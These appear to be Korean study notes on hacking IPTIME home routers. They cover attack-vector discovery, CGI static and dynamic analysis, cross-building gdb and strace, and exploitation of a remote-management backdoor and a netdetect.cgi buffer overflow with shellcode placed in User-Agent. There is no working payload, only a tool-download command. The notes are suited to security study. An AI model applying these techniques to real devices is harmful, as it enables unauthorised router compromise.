# iwconfig로 확인시 Access Point가 잡혀 있을 것

$ dhclient wlan0 &
# ip 주소 할당까지 받으면 완료

• 이것저것 삽질을 하다가 NetworkManager로는 못 하고, 결국 CLI로 연결을 했다.
• 잘 안 되면 wpa_supplicant 전후로 rebooot 해주기

취약점 탐지 전략

어택 벡터

• 부팅 과정 중 개발자의 실수
• 입력 받는 대상 파악
  • 입력을 가할 수 있는 부분이 취약점을 얻어낼 수 있는 부분
  • 대표적으로 웹페이지 쪽
• 논리적 취약점
  • 부팅 시퀀스에서 실수한 부분
  • 플래그 값을 가지고 서로 다른 액션을 하는데, 플래그가 쉽게 바뀔 수 있는 경우
• 버퍼 오버플로우, 포맷 스트링 등..

디버깅

• 취약점을 찾아서 분석 + 쉘코드 작성을 해서 공략을 하려고 해도, 한 번에 되기 쉽지 않다.
• 디버깅을 해야 공격코드의 문제점 등을 파악할 수 있다.
• 익스플로잇 코드를 만들기 전에도 디버깅을 통해서 취약점을 찾거나, 공격 설계를 하거나 할 수 있다.

부팅과정 분석

• 보통은 /etc/init.d/rcS 스크립트가 실행된다.

프로세스 목록

• 프로세스 목록을 확인하면 공격 벡터로 삼을만한 부분을 예측할 수 있다.
• upnp, httpd, /sbin/dhcpd ...

Boa Web Server

• /var/boa_vh.conf
• 웹서버 종류에 따라서 이미 웹서버에 알려진 취약점이 있을 수 있다.
• 특정 임베디드용 웹서버가 올라가 있다? → 버전 확인 → 알려진 취약점 탐색
• 알려진 취약점을 공격해서 익스플로잇
• 개발용 cgi 등은 백도어로 쓰일 수 있다.

/home/httpd

• index.html
• login/login.cgi 등을 호출
• boa 웹서버 설정 내용을 보면 Alias가 존재하기도 한다.

CGI

• IPTIME은 필요한 내용들만 구현해서 쓴다고 한다.

CGI는 실행 파일

• CGI는 C로 만든 애플리케이션이라고 생각하면 된다!
• 요즘은 CGI 개발을 잘 안 하고, Python이나 Go 등 사용하기 쉽고 개발 생태계가 활성화 되어있는 것들을 사용한다.
• 스크립트도 가끔 쓰인다.

정적 분석

• CGI를 가지고 취약점 탐색
• 입력 받는 부분, 장비 내에서 실행되는 바이너리 등
• strcpy, sprintf, system, strcat, execl, getenv
• 바운더리 체크를 하지 않고 버퍼를 복사하는 경우
• 환경변수에 긴 문자열을 넣어서 쓸 수도 있다.

동적 분석

• 실제로 CGI를 실행하면서 어떤 함수들이 호출되는지를 쉽게 파악할 수 있는 도구들을 이용
  • ltrace : 라이브러리 호출 보여줌
  • strace : 시스템 호출 보여줌
  • gdb : 디버깅
• 에뮬레이터, 백도어, UART 등을 이용해서 쉘을 활용하며 동적으로 분석
• 동적 분석을 하기 위해서는 바이너리를 빌드해서 올려야 하는 경우가 대부분
  • 판매용 제품에 디버깅 툴을 넣어 놓지는 않기 때문
  • 이유 : 필요 없어서, 디버깅 툴은 사이즈를 많이 잡아먹기 때문

ARM 기반 디버깅

필요한 도구 : gdb, strace, ltrace

• static으로 빌드한 경우 바로 실행을 할 수 있다.
• qemu 이미지로 만들어서 돌려볼 수 있긴 한데 실제로 이렇게까지 할 필요는 없다.
• 예전에는 실행을 하려면 별도의 패키지를 설치해야 했는데, 요즘은 바로 실행 가능하다.

strace 컴파일

• 디버깅 툴이 기본적으로 안 올라가 있다.
• 장비에서 동적으로 분석을 하기 위해서는 컴파일을 하거나, 컴파일 된 것을 구해야 한다.
• 인터넷을 뒤져보면 누가 static으로 빌드해서 올려놓은 것들이 종종 있다. 그걸 이용하거나 직접 빌드를 해야 한다.

프로세스 실행 모니터링

strace -i -f -p PID -e trace=execve

• 시스템 콜 호출 확인

gdb & gdbserver 컴파일

임베디드 쪽을 한다고 하면 꼭 필요한 지식

• strace, ltrace는 없어도 되지만 gdb 없이는 동적으로 분석할 수 없다.
• gdbserver를 보통 타겟에다가 넣고, gdb는 크로스 컴파일을 한다.
• gdbserver를 쓰면 네트워크나 시리얼 포트를 이용해서 데스크탑 gdb와 연결을 해야 한다.

gdbserver를 왜 쓰느냐?

• gdb를 빌드해서 올리기 어려운 환경일 수도 있다.
• gdb 자체가 사이즈가 꽤 크다.
• 아니면 gdb를 타겟용으로 빌드하는데 문제가 생길 수도 있다.
• 즉, 제품을 개발할 수 있는 환경을 그대로 구성하지 못하면 디버깅 하기 매우 어렵다.

ltrace 컴파일

• 컴파일시 에러가 매우 많이 나온다. buildroot를 이용하는 것을 권장
• buildroot를 이용하면 ltrace, strace 다 쉽게 얻을 수 있다.

Buildroot & Yocto

yocto : 요즘 많이 쓰는 임베디드쪽 빌드 시스템

• 이미 세팅이 되어 있는 내용들이 있음 like Makefile
  • Makefile은 일종의 스크립트 처럼 빌드 절차를 나열해 놓고, 미리 정의된 내용이 실행되어 결과물을 쉽게 얻을 수 있는 아주 기본적인 빌드 시스템이다.
  • yocto도 비슷하다.
• yocto에서의 Makefile 같은 것을 레시피라고 한다.
• 레시피에 나와 있는 것을 그대로 쓰면 똑같은 결과물이 나온다.
• yocto에서 빌드를 하면 부트로더, 커널, 파일시스템 등을 정해진 설정대로 쉽게 만들 수 있다.

장점 : 어떤 환경에서든 똑같은 결과물을 낼 수 있다!

• yocto가 나오기 전에 썼던 빌드 시스템이 Buildroot이다.
• 여기서도 부트로더, 커널, 루트파일시스템을 다 빌드할 수 있다.
• yocto는 방대한 시스템을 전체적으로 다 빌드해주는 대신, 설정을 임의로 할 수 있는 부분이 별로 없다.
• 반면 buildroot는 거대한 시스템 보다는 작은 시스템에 맞춰진 툴이다.
• 특정 타겟에 고정되어 있다기 보다는 유도리 있게 설정할 수 있게끔 기능을 제공한다.
• 지금도 간단한 시스템에는 많이 쓰인다고 한다.

외부 파일 다운로드

어떤 툴들이 존재하는지 확인을 해야 함

• wget, nc, scp, ftp, rz
• /sbin/http

/sbin/http get http://IP/gdb > gdb

• http 프로토콜을 사용해서 웹페이지나 파일을 다운로드 받을 수 있다.
• 네트워크가 안 되더라도 시리얼 프로토콜로 연결할 수 있다.

임베디드 기기의 용량 문제

• 램 파일시스템(RAMFS)을 사용해서 파일을 다운로드 받아서 실행할 수 있다.
• 이것 조차도 얼마 안 남아있을 수도..
• 최소 16MB~32MB 정도?

발견된 취약점

• 원격 관리용 백도어
• netdetect.cgi의 원격 bof 취약점
• 그 외
  • smtp command injection
  • httpd
  • apcpd
• 시간 지나면 금방 패치된다.

원격 관리용 백도어

관련 슬라이드는 해커스쿨 Home Router Hacking 자료를 참고

• 2007년도에 이슈가 되었다.
• 내부 명령 실행, 파일 열람 모두 가능
• 디버깅과 개발 시 편의성을 위해 만들어진 페이지

• 패스워드(Key) - 리버싱을 통해 알아낼 수 있다.
• strings로 봤을 때 안 나오게 하려고 쪼개 놓은 경우도 있지만 리버싱 하면 다 나온다.
• 커맨드를 입력하면 system으로 실행되게끔 해준다.
• /etc/iconfig.cfg
• remote_support=1로 활성화
• cgi 호출하면서 리버싱으로 알아낸 키 값을 넣어주면 커맨드가 실행된다.

Remote Buffer Overflow

관련 슬라이드는 해커스쿨 Home Router Hacking 자료를 참고

• 코딩을 잘못 해서 발생한 취약점
• Timepro.cgi == Netdetect.cgi 심볼릭
  • Netdetecgt.cgi로 접근을 하면 관리자 암호 없이도 접속이 가능
• 관리자 권한을 체크하지 않기 때문에 굉장히 크리티컬한 취약점이다.

URL 파라미터 처리부

• 인자를 넘겨줄 때, 환경변수를 가져올 때 strcpy를 사용해서 복사한다.

• 위와 같이 인자를 길게 넘겨주고strace로 보면 SIGSEGV가 발생해 있을 것이다.
• 이런 식으로 실행 흐름의 중요한 역할을 하는 메모리 영역을 덮어 쓴다.

• 입력한 commit 값이 복사가 되면서 버퍼도 다 차고, 스택 영역의 레지스터 값들도 overwrite 된다.

쉘코드

• 쉘코드를 아무데나 올릴 수는 없다.
• 보안 시스템 체크
  • ASLR : 메모리 주소 값 랜덤화
  • DEP : 스택 힙 실행 권한 제거
• 스택 덤프
  • ASLR, DEP가 둘 다 없는 경우 스택에 쉘코드 주입
  • cgi 실행시 스택 덤프를 해보면, 스택에 어떤 데이터가 저장되는지 확인할 수 있다.
  • User-Agent 값이 존재 → 여기에 값을 넣자
• 최종 대상 선정
  • User-Agent

• User-Agent 변수에 쉘코드를 넣음

Ref

• Home Router Hacking 유무선 공유기 해킹

Solve

# 관련 패키지, 라이브러리 설치
sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev

# sasquatch 설치
git clone https://github.com/devttys0/sasquatch.git

cd sasquatch

./build.sh

• Squashfs 파일시스템의 원활한 추출을 위해 sasquatch를 설치해 준다.

• 또는 binwalk를 설치할 때 apt get 대신 README.md 문서에 나와있는 대로 설치하면 된다.

References

• Github devttys0/sasquatch